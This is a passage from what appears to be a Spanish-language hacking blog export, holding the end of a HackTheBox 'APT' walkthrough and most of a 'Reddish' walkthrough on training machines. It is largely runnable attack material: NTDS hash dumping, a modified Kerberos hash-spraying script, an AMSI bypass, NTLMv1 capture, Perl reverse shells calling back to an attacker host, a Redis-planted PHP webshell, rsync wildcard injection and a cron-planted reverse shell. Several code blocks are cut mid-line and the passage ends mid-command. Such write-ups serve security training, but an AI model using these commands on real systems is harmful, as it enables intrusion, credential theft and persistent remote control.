(puerto 161) con Enyx https://github.com/trickster0/Enyx pero siempre y cuando el servicio este abierto. ```zsh echo \"dead:beef::b885:d62a:d679:573f apt.htb apt.htb.local\" | sudo tee -a /etc/hosts ``` ### SMB ```zsh nxc smb apt.htb.local -u '' -p '' ``` ![Image](image-5.png) `windows 10 / server 2016 build 14393` ```zsh smbclient -L apt.htb.local -N ``` ![Image](image-6.png) ```zsh smbclient //apt.htb.local/backup -N ``` ![Image](image-7.png) ```zsh 7z l backup.zip ``` ```zsh Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2020-09-23 11:40:25 D.... 0 0 Active Directory 2020-09-23 11:38:20 ..... 50331648 8483543 Active Directory/ntds.dit 2020-09-23 11:38:20 ..... 16384 342 Active Directory/ntds.jfm 2020-09-23 11:40:25 D.... 0 0 registry 2020-09-23 11:22:12 ..... 262144 8522 registry/SECURITY 2020-09-23 11:22:12 ..... 12582912 2157644 registry/SYSTEM ------------------- ----- ------------ ------------ ------------------------ 2020-09-23 11:40:25 63193088 10650051 4 files, 2 folders ``` - Unzip ![Image](image-8.png) ```zsh zip2john backup.zip > zip.hash ``` ![Image](image-9.png) ```zsh john zip.hash -w=/usr/share/wordlists/rockyou.txt ``` ```zsh iloveyousomuch (backup.zip) ``` ## NTDS Secrets https://www.thehacker.recipes/ad/movement/credentials/dumping/ntds#_2-parsing ```zsh /usr/bin/impacket-secretsdump -system registry/SYSTEM -ntds Active\\ Directory/ntds.dit LOCAL > hashes ``` ![Image](image-10.png) ```zsh cat hashes | grep \"aad3b435b51404eeaad3b435b51404ee\" | sponge hashes3 ``` - Users ```zsh grep -oP '^[^:]+' hashes3 > users ``` - Hashes ```zsh grep -oP '^[^:]+:[^:]+:[^:]+:\\K[^:]+' hashes3 > hash1 ``` ### Enumeration Users | Kerbrute ```zsh ./kerbrute userenum --dc apt.htb.local -d htb.local users ``` ``` APT$@htb.local Administrator@htb.local henry.vinson@htb.local ``` ![Image](image-11.png) ### ASREP-Roasting | TGT ```zsh /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/ -no-pass -usersfile valid_user.txt Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] User henry.vinson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User APT$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set ``` Intetaremos usar el hash de henry.vinson para averiguar si es la correcta ![Image](image-12.png) ## Password Spraying Despues de 20 intentos la maquina nos bloquea a traves de smb, podriamos intentar con kerbrute pero no permite brute force, necesitaremos otra herramienta que nos permita hacer brute force con hashes https://github.com/cube0x0/HashSpray.py Con esta herramienta nos permite hacer brute force hacia kerberos pero solo nos permite 1 hash y queremos que pruebe con varios hashes (para esto tenemos que modifica el script para que nos permita probar multiples hashes) ```python #!/usr/bin/python3 from __future__ import division from __future__ import print_function import argparse import sys from binascii import unhexlify from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError from impacket.krb5 import constants from impacket.krb5.types import Principal import multiprocessing import socket def login(username, password, domain, lmhash, nthash, aesKey, dc_ip): try: kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value) getKerberosTGT(kerb_principal, password, domain, unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip) print('[+] Success %s/%s' % (domain, username) ) return \"success\" except KerberosError as e: if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value): print(\"[-]Could not find username: %s/%s\" % (domain, username) ) elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value: return else: print(e) except socket.error as e: print('[-] Could not connect to DC') return if len(sys.argv) \") exit() else: domain = sys.argv[1] username = sys.argv[2] lmhash = 'aad3c435b514a4eeaad3b935b51304fe' aesKey = None dc_ip = sys.argv[3] hashfile = sys.argv[4] with open(hashfile, \"r\") as f: num_lines = len(f.readlines()) print(\"[*] Spraying Hashes...\\n\") print(\"[i] Domain: \"+domain) print(\"[i] Target User: \"+username) print(\"[i] Domain Controller: \"+dc_ip) with open(hashfile, \"r\") as f: hashes = f.readlines() i = 1 for ntlm in hashes: i = i+1 print(\"[*] Current line: \"+str(i)+\"/\"+str(num_lines), end=\"\\r\") nthash = ntlm.strip('\\r\\n') if(login(username, '', domain, lmhash, nthash, aesKey, dc_ip) == \"success\"): print(\"[+] Hash Found: \" + nthash) exit() ``` ![Image](image-13.png) ```hash e53d87d42adaa3ca32bdb34a876cbffb ``` ### Validate Credentials ```zsh nxc smb apt.htb.local -u 'henry.vinson' -H 'e53d87d42adaa3ca32bdb34a876cbffb' ``` ![Image](image-14.png) Para smb tener inicio de sesion, pero para winrm no ![Image](image-15.png) ### Kerberoasting Attack | TGS Intentare ahora obtener un tgs (kerberoasting attack), anteriormente intentamos un tgt(GetSPNUsers), ahora sera al revez ahora usaremos GetUserSPNs. ```zsh /usr/bin/impacket-GetUserSPNs htb.local/henry.vinson -hashes :e53d87d42adaa3ca32bdb34a876cbffb ``` ![Image](image-16.png) ## Registry Hives https://www.herongyang.com/Windows/Registry-Hives-HKCR-HKCU-HKLM-HKU-HKCC-HCPD.html ```zsh /usr/share/doc/python3-impacket/examples/reg.py -dc-ip apt.htb.local htb.local/henry.vinson@apt.htb.local -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName HKCU\\\\SOFTWARE ``` ![Image](image-17.png) `GiganticHostingManagementSystem` ![Image](image-18.png) ```zsh /usr/share/doc/python3-impacket/examples/reg.py -dc-ip apt.htb.local htb.local/henry.vinson@apt.htb.local -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName HKCU\\\\SOFTWARE\\\\GiganticHostingManagementSystem ``` ![Image](image-19.png) ```powershell henry.vinson_adm G1#Ny5@2dvht ``` ### Validate Credentials - smb ```zsh nxc smb apt.htb.local -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht' SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows 10 / Server 2016 Build 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) SMB dead:beef::b885:d62a:d679:573f 445 APT [+] htb.local\\henry.vinson_adm:G1#Ny5@2dvht ``` - winrm ```zsh nxc winrm apt.htb.local -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht' WINRM dead:beef::b885:d62a:d679:573f 5985 APT [*] Windows 10 / Server 2016 Build 14393 (name:APT) (domain:htb.local) /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM dead:beef::b885:d62a:d679:573f 5985 APT [+] htb.local\\henry.vinson_adm:G1#Ny5@2dvht (Pwn3d!) ``` ```zsh evil-winrm -i htb.local -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht' ``` ![Image](image-20.png) Bueno al intentar ejectuar el winPEASx64.exe, el defender actua y no nos permite hacer el analisis de vulnerabilidad, para poder bypassear el AMSI usaremos el menu de Evil-winrm `menu` ![Image](image-21.png) `Bypass-4MSI` `menu` ![Image](image-22.png) Ahora podemos usar el Invoke-Binary para poder ejecutar el winPEAS desde nuestra maquina, lo que intenta guardarlo en la memoria y desde alli ejecutarlo. Por alguna razon no me deja ejecutar el winPEAS pero tenemos otra opcion con Seatbelt que es similar al winPEAS. ![Image](image-23.png) Incluso verificamos que su arquitectura es de 64 bits ```powershell [Environment]::Is64BitOperatingSystem ``` ![Image](image-24.png) Ahora si podemos analizar alguna vulnerabilidad ![Image](image-25.png) ```powershell Invoke-Binary /home/kali/Documents/HTB/APT/Seatbelt.exe -groups=all ``` ![Image](image-26.png) Vemos que la maquina soporta NTLMv1 y esto es critico debido a que la encriptacion debil por su antiguedad [Network security: LAN Manager authentication level](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level) Para poder capturar el hash ntlmv1 necesitamos de un recurso que intente autenticarse, en este caso `MpCmdRun` intentara autenticarse para hacer un escaneo sobre un recurso compartido (nosotros) y con responder capturar el hash de la autenticacion por parte del windows defender. ```powershell .\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\10.10.14.20\\test ``` ```zsh sudo responder -I tun0 --lm ``` ![Image](image-27.png) ```zsh APT$::HTB:55CCBC2A353B72BB5F55A50CB12F8062B8F9A26CA0F1D4D8:55CCBC2A353B72BB5F55A50CB12F8062B8F9A26CA0F1D4D8:9741345b1e30d734 ``` Ahora necesitamos formatear el hash NTLMv1 https://github.com/evilmog/ntlmv1-multi ```zsh python3 ntlmv1.py --ntlmv1 \"APT$::HTB:55CCBC2A353B72BB5F55A50CB12F8062B8F9A26CA0F1D4D8:55CCBC2A353B72BB5F55A50CB12F8062B8F9A26CA0F1D4D8:9741345b1e30d734\" ``` Al parecer se usa una pagina web para encontrar u obtener el hash nt https://crack.sh/get-cracking/ pero por el momento esta caida la web. Algo asi deberia llegar usando la pagina web que por el momento no esta activa. ![Image](image-28.png) No encontre otra forma de obtener el nt hash asi que por el momento usare un writeup para usar el nt hash. ```zsh impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb::: henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef::: APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3 Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413 Administrator:des-cbc-md5:0816d9d052239b8a krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b krbtgt:des-cbc-md5:f8c26238c2d976bf henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2 henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af henry.vinson:des-cbc-md5:73b6f71cae264fad henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4 henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b henry.vinson_adm:des-cbc-md5:5df8682c8c07a179 APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454 APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9 APT$:des-cbc-md5:76c45245f104a4bf [*] Cleaning up... ``` ```zsh evil-winrm -u administrator -H c370bddf384a691d811ff3495e8a72e2 -i apt.htb ``` ![Image](image-29.png) Rooted 30/06/25"},{"id":"reddish","title":"HTB - Reddish","description":"HTB - Reddish","date":"2025-06-20T16:17:34.000Z","tags":["HackTheBox","nodered","redis","pivoting","socat","cron","wildcards","rsync","perl","containers","chisel","Insane"],"authors":[],"url":"/blog/reddish","content":"## Box Info | Name | Reddish | | :-------------------- | ---------------: | | Release Date | 21 Jul, 2018 | | OS | Linux | | Rated Difficulty | Insane | ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.10.94 -oG allPorts ``` Solo se encontro 1 puerto abierto ![Image](image-1.png) ```zsh nmap -sCV -p 1880 10.10.10.94 -oN targeted ``` ```r # Nmap 7.95 scan initiated Wed Jun 18 19:42:30 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 1880 -oN targeted 10.10.10.94 Nmap scan report for 10.10.10.94 Host is up (0.15s latency). PORT STATE SERVICE VERSION 1880/tcp open http Node.js Express framework |_http-title: Error Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jun 18 19:42:47 2025 -- 1 IP address (1 host up) scanned in 16.69 seconds ``` ### Web ![Image](image.png) Abrimos ese servicio web y encontramos un error, esto lo podemos resolver enviando un POST para ver que obtenemos. ```zsh curl --request POST \"http://10.10.10.94/\" | jq ``` Podemos ver que nos responde con un informacion en JSON. ```json { \"id\": \"4598d31cb6a767d6f93de51a67df4fa0\", \"ip\": \"::ffff:10.10.14.2\", \"path\": \"/red/{id}\" } ``` El JON especifica una ruta indicando un \"id\" ![Image](image-2.png) **Node-RED** es una herramienta de programación basada en flujo para conectar dispositivos IoT. ![Image](image-3.png) ## Shell in Node-RED Podemos crear nuestro propio flujo de diagrama, en este caso una reverse shell. ![Image](image-4.png) `TPC INPUT -> EXEC -> TCP OUTPUT` Una vez arrastramos los nodos, los configuramos. - Tcp Output: Type `Connect to` ![Image](image-5.png) - Tcp Output: Type ``Reply to TCP` ![Image](image-6.png) ### Method 2 | Simple Command Shell Pero en este caso, usaremos una revers shell en formato JSON para importarlo directamente a nuestro diagrama de flujo. [Github - Node-Red-Reverse-Shell](https://github.com/valkyrix/Node-Red-Reverse-Shell/blob/master/node-red-reverse-shell.json) ```zsh [{\"id\":\"7235b2e6.4cdb9c\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"d03f1ac0.886c28\",\"type\":\"tcp out\",\"z\":\"7235b2e6.4cdb9c\",\"host\":\"\",\"port\":\"\",\"beserver\":\"reply\",\"base64\":false,\"end\":false,\"name\":\"\",\"x\":786,\"y\":350,\"wires\":[]},{\"id\":\"c14a4b00.271d28\",\"type\":\"tcp in\",\"z\":\"7235b2e6.4cdb9c\",\"name\":\"\",\"server\":\"client\",\"host\":\"10.10.14.2\",\"port\":\"9001\",\"datamode\":\"stream\",\"datatype\":\"buffer\",\"newline\":\"\",\"topic\":\"\",\"base64\":false,\"x\":281,\"y\":337,\"wires\":[[\"4750d7cd.3c6e88\"]]},{\"id\":\"4750d7cd.3c6e88\",\"type\":\"exec\",\"z\":\"7235b2e6.4cdb9c\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":517,\"y\":362.5,\"wires\":[[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"]]}] ``` Import -> Clipboard ![Image](image-7.png) ![Image](image-8.png) Importamos y ejecutamos el diagrama de flujo y obtendremos una shell. ![Image](image-9.png) Tenemos la IP `172.19.0.3` y la IP `172.18.0.2` ![Image](image-10.png) ### Perl Al enumerar la máquina, descubrí que no tiene `Python, Python3, Netcat (nc), PHP` o ifconfig, pero sí tiene Perl. ![Image](image-11.png) Como no puedo usar comandos que me permitan seguir enumerando, con el uso de perl obtendre una shell interactiva con perl. ```perl perl -e 'use Socket;$i=\"10.10.14.2\";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};' ``` Se puede hacer de 2 maneras: - **Ejecutar mediante el Flujo de Diagrama (EXEC Node).** - **Ejecutar directamente el script en perl con la shell no interactiva.** ![Image](image-12.png) ## Node-Red - Container Una vez obtenido la shell interactiva, podemos darnos cuenta que somos root. Dado que esta máquina carece de herramientas esenciales como Python o Netcat (nc), y su IP no coincide con 10.10.10.94, puedo deducir que estamos dentro de un contenedor. ![Image](image-13.png) Para confirmar podemos utilizar ip a para ver las interfaces de red ```zsh ip a ``` ```zsh 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 11: eth0@if12: mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0 valid_lft forever preferred_lft forever 19: eth1@if20: mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:13:00:04 brd ff:ff:ff:ff:ff:ff inet 172.19.0.4/16 brd 172.19.255.255 scope global eth1 valid_lft forever preferred_lft forever ``` #### Enumeration ```zsh find \\-name *config* 2>/dev/null ``` ```zsh find . -type f ``` Enumeramos pero no se encontro nada interesante ### Network Enumeration #### Check ARP Podemos listar el ARP que nos permite vizualizar direcciones IP, direcciones MAC y la interfaz de red correspondiente. ```bash cat /proc/net/arp ``` ```zsh IP address HW type Flags HW address Mask Device 172.18.0.1 0x1 0x2 02:42:de:ac:1d:ce * eth0 ``` ### Ping Sweep Utilicé este script para el barrido de ping para buscar otros hosts/contenedores y enumerar todas las IP en el rango de subred 172.19.0.0/24. ```zsh for i in {1..255};do (ping -c 1 172.18.0.$i|grep \"bytes from\"|cut -d' ' -f4|tr -d ':' &);done ``` ```r 172.18.0.1 /dev/tcp/$host/$port\" 2> /dev/null && echo -e \"\\t[+] Port: $port - OPEN!\" & done; wait done ``` `base64 -w 0 portScan.sh` ```bash echo \"IyEvYmluL2Jhc2gKCmhvc3RzPSgiMTcyLjE4LjAuMSIgIjE3Mi4xOS4wLjEiICIxNzIuMTkuMC4yIiAiMTcyLjE5LjAuMyIpCgpmb3IgaG9zdCBpbiAke2hvc3RzW0BdfTsgZG8KICAgICAgICBlY2hvIC1lICJcblsrXVNjYW5uaW5nIHBvcnRzIGluICRob3N0XG4iCiAgICAgICAgZm9yIHBvcnQgaW4gJChzZXEgMSAxMDAwMCk7IGRvCiAgICAgICAgICAgICAgICB0aW1lb3V0IDEgYmFzaCAtYyAiZWNobyAnJyA+IC9kZXYvdGNwLyRob3N0LyRwb3J0IiAyPiAvZGV2L251bGwgJiYgZWNobyAtZSAiXHRbKl0gUHVlcnRvOiAkcG9ydCAtIEFCSUVSVE8gWypdIiAmCiAgICAgICAgZG9uZTsgd2FpdApkb25lCg==\" | base64 -d > portScan.sh ``` ```zsh ./portScan.sh [+]Scanning ports in 172.18.0.1 [+] Port: 1880 - OPEN! [PortForwarding HOST] [+]Scanning ports in 172.19.0.1 [+]Scanning ports in 172.19.0.2 [+] Port: 6379 - OPEN! [Interesting] [+]Scanning ports in 172.19.0.3 [+] Port: 1880 - OPEN! [+]Scanning ports in 172.19.0.4 [+] Port: 80 - OPEN! [Interesting] ``` Ese 1880 es el puerto reenviado a la máquina virtual nodered. ## Pivoting **Hay varias maneras de realizar pivoteo (movimiento lateral)** 1. **Usando Meterpreter:** - Obtener una session meterpreter en NodeRed. - Con el comando `portfwd` en meterpreter podemos crear un tunel desde mi maquina local a la maquina victima(similar a un SSH Tunnel) 2. **Creación de una interfaz de escucha web con Node-RED:** - Configurar un flujo en Node-RED para redirigir (tunelizar) el tráfico entre redes. 3. **Usar herramientas de Tunneling:** - **Chisel:** Herramienta para crear túneles TCP/UDP rápidos y sigilosos. - **Socat:** Versátil para redirección de conexión. - Ahora reduciremos el peso de chisel para poder hacer una transferencia del chisel mas rapido. ```zsh du -hc chiselNew 9.0M chiselNew 9.0M total ``` ```zsh upx chiselNew ``` ```zsh du -hc chiselNew 3.6M chiselNew 3.6M total ``` - Transfer Chisel (netcat y tcp) ```zsh nc -nlvp 444 chiselNew Tip: Algunas maquinas no tienen herramientas para transferir archivos y esta utilidad sirve para esos casos, haciendo uso del tcp y definiendo una funcion. ```zsh function __curl() { read -r proto server path &2 \"sorry, %s supports only http\\n\" \"${FUNCNAME[0]}\" return 1 fi DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [ \"${HOST}\" = \"${PORT}\" ] && PORT=80 exec 3<>\"/dev/tcp/${HOST}/$PORT\" printf 'GET %s HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n' \"${DOC}\" \"${HOST}\" >&3 (while read -r line; do [ \"$line\" = $'\\r' ] && break done && cat) &- } ``` [How to download a file using just bash and nothing else no curl wget perl etc](https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et) - Curl Function ```bash __curl http://10.10.14.2:8080/chiselNew > chisel ``` Podemos verificar la transferencia si fue correcta con md5 ![[Pasted image 20250619161219.png]] ### Chisel (Adding Forwards) - NodeRed Container ```zsh ./chisel client 10.10.14.2:1234 R:80:172.19.0.4:80 R:6379:172.19.0.2:6379 ``` - Kali ```zsh ./chiselNew server --reverse -p 1234 ``` ```zsh sudo nmap -sCV -p 80,6379 127.0.0.1 -oN localScan ``` ```zsh Nmap scan report for localhost (127.0.0.1) Host is up (0.000045s latency). PORT STATE SERVICE VERSION 80/tcp open tcpwrapped 6379/tcp open tcpwrapped ``` ![Image](image-15.png) ### Metasploit (Port Forwarding) Como no obtengo ninguna información con Nmap mientras hago el reenvío de puertos con Chisel, intentaré hacerlo con Metasploit para ver si puedo obtener alguna información. ```zsh msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=445 -f elf -o shell.elf ``` ```zsh nc -nlvp 444 shell.elf 80 -> 127.0.0.1 `http://127.0.0.1/` ![Image](image-19.png) - View Page Source Al revisar el código fuente, podemos ver un código JavaScript interesante. ```javascript Reddish $(document).ready(function () { incrCounter(); getData(); }); function getData() { $.ajax({ url: \"8924d0549008565c554f8128cd11fda4/ajax.php?test=get hits\", cache: false, dataType: \"text\", success: function (data) { console.log(\"Number of hits:\", data) }, error: function () { } }); } function incrCounter() { $.ajax({ url: \"8924d0549008565c554f8128cd11fda4/ajax.php?test=incr hits\", cache: false, dataType: \"text\", success: function (data) { console.log(\"HITS incremented:\", data); }, error: function () { } }); } /* * TODO * * 1. Share the web folder with the database container (Done) * 2. Add here the code to backup databases in /f187a0ec71ce99642e4f0afbd441a68b folder * ...Still don't know how to complete it... */ function backupDatabase() { $.ajax({ url: \"8924d0549008565c554f8128cd11fda4/ajax.php?backup=...\", cache: false, dataType: \"text\", success: function (data) { console.log(\"Database saved:\", data); }, error: function () { } }); } It works! This is the default web page for this server. The web server software is running but no content has been added, yet. ``` Hay llamadas AJAX a la URL 8924d0549008565c554f8128cd11fda4/ llamada backupDatabase. Además, comparten una ruta en los comentarios. Puedo suponer que estas rutas y comandos se ejecutan en la base de datos de Redis. - Reviewing the path's of source code ```zsh http://127.0.0.1/f187a0ec71ce99642e4f0afbd441a68b/ ``` ![Image](image-20.png) La ruta existe y, además, al utilizar el comando de copia de seguridad mencionado anteriormente, la salida indica que no se encontró ajax.php, lo que indica que aún no se ha implementado. ```zsh http://127.0.0.1/f187a0ec71ce99642e4f0afbd441a68b/ajax.php?backup=/etc/passwd ``` ![Image](image-21.png) ### DataBase Mientras buscaba **Redis 4.0.9** en Google, encontré que **HackTricks** tiene un manual de enumeración para ello. - basic enumeration with nc [Pentesting Redis](https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html?highlight=redis#manual-enumeration) ```zsh nc -vn 127.0.0.1 6379 ``` `info` ![Image](image-22.png) `info keyspace` ![Image](image-23.png) `keys *` ![Image](image-24.png) Encontramos una clave llamada _\"hits\"_ que hace referencia al código fuente que descubrimos en la página web 172.19.0.4. De alguna manera, está relacionada con este servicio web (`172.19.0.2 --related--> 172.19.0.4). Cada vez que recargaba la página, el contador de visitas aumentaba, como se define en el código fuente. ![Image](image-25.png) ### WebShell ![Image](image-26.png) ![Image](image-27.png) [Redis-Hacking-Tips](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html) ```bash ``` >Tip: Es necesario insertar 3 saltos de línea para no insertar etiquetas y no dañar el archivo. ```zsh cat cmd.php | redis-cli -h 127.0.0.1 -x set reverse ``` ```zsh redis-cli -h 127.0.0.1 config set dir /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/ ``` ```zsh redis-cli -h 127.0.0.1 config set dbfilename \"cmd.php\" ``` ### Script Redis WebShell ![Image](image-28.png) Parece que hay un script que elimina el archivo .php, por lo que creamos un script para automatizar la carga webshell. ```zsh #!/bin/bash cat cmd.php | redis-cli -h 127.0.0.1 -x set reverse redis-cli -h 127.0.0.1 config set dir /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/ redis-cli -h 127.0.0.1 config set dbfilename \"cmd.php\" redis-cli -h 127.0.0.1 save ``` ```url http://127.0.0.1/f187a0ec71ce99642e4f0afbd441a68b/cmd.php?cmd=whoami ``` ![Image](image-29.png) Lo intenté con una reverse shell pero no funcionó, así que intenté con ping y me respondio \"Operación no permitida\" que indica que no tenemos suficientes permisos. ```zsh ping -c 1 10.10.14.2 2%3E%261 ``` ![Image](image-30.png) ```r 172.18.0.1 &S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};' ``` >Tip: Url-encodea la reverse shell en perl ## Privesc ### Identifying Backup Cron ![Image](image-33.png) Ahora tenemos una shell en 172.19.0.3. ![Image](image-34.png) ``` bergamotto somaro ``` Encontramos que hay un Segmento B (división de una red más grande en secciones más pequeñas) ![Image](image-35.png) Podemos ver la flag del usuario somaro. ``` find / -name \"user.txt\" 2>/dev/null ``` ![Image](image-36.png) Con `ps aux` podemos ver los servicios ejecutados en este caso de root ejecutnado una tarea cron ![Image](image-37.png) ```bash #!/bin/bash IFS=$'\\n' old=$(ps -eo command) while true; do new=$(ps -eo command) diff ] sleep .3 old=$new done ``` ``` base64 -w 0 procmon.sh ``` `172.19.0.4` ``` echo \"IyEvYmluL2Jhc2gKCklGUz0kJ1xuJwoKb2xkPSQocHMgLWVvIGNvbW1hbmQpCndoaWxlIHRydWU7IGRvCiAgICBuZXc9JChwcyAtZW8gY29tbWFuZCkKICAgIGRpZmYgPChlY2hvICIkb2xkIikgPChlY2hvICIkbmV3IikgfCBncmVwIFtcPFw+XQogICAgc2xlZXAgLjMKICAgIG9sZD0kbmV3CmRvbmUKCg==\" | base64 -d > procmon.sh ``` ![Image](image-38.png) ``` /usr/sbin/CRON > /bin/sh -c sh /backup/backup.sh > sh /backup/backup.sh > rsync -a rsync://backup:873/src/backup/ /var/www/html/ test.rdb ``` ```bash touch -- '-e sh test.rdb' ``` ![Image](image-40.png) ![Image](image-41.png) Ahora que somos root podemos enumerar las IP's en el segmento 172.20.0.3/16 ```perl 172.20.0.1 172.20.0.3 reverse ``` ```zsh rsync reverse rsync://backup/src/etc/cron.d/reverse ``` ![Image](image-46.png) El archivo reverse shell aún no existe, pero lo crearemos para obtener una reverse shell usando Perl. ```perl perl -e 'use Socket;$i=\"172.20.0.3\";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};' ``` Pero para eso, necesitamos que la máquina 172.0.0.2 se conecte de nuevo a mi máquina Kali. Usaremos **socat** para redirigir la conectividad. ```zsh __curl http://172.19.0.3:1111/socat > socat ``` Ahora necesitamos cargar nuestro archivo **reverse.sh** usando codificación base64. ```zsh echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTcyLjIwLjAuMyI7JHA9Nzc3Nztzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9OycK | base64 -d > reverse.sh ``` ![Image](image-47.png) ```zsh rsync reverse.sh rsync://backup/src/etc/cron.d/reverse.sh ``` ```zsh ./socat TCP-LISTEN:7777 stdout ``` ![Image](image-48.png) ## Reddish Host ![Image](image-49.png) Con `df -h` nos mostrará los dispositivos montados. ```zsh df -h ``` Enumeraremos dispositivos, mostrando información sobre discos duros, particiones, dispositivos de almacenamiento como USB y otros. ```zsh lsblk ``` ![Image](image-50.png) ```zsh ls /dev/sda* /dev/sda /dev/sda1 /dev/sda2 /dev/sda3 ``` Cambiaremos el **MOUNT POINT** a /temp/test. ```zsh mount /dev/sda2 /mnt/test ``` Podemos ver otro sistema de archivos. ![Image](image-51.png) Incluso podemos ver la flag de root.txt ![Image](image-52.png) >Reddish distribuye los usuarios y el root en contenedores separados. Para obtener un shell inverso, continuaremos con el mismo proceso cron y base64 de Perl que hemos hecho antes. ```zsh echo '* * * * * root sh /tmp/reverse.sh' > task ``` ![Image](image-53.png) ```zsh echo 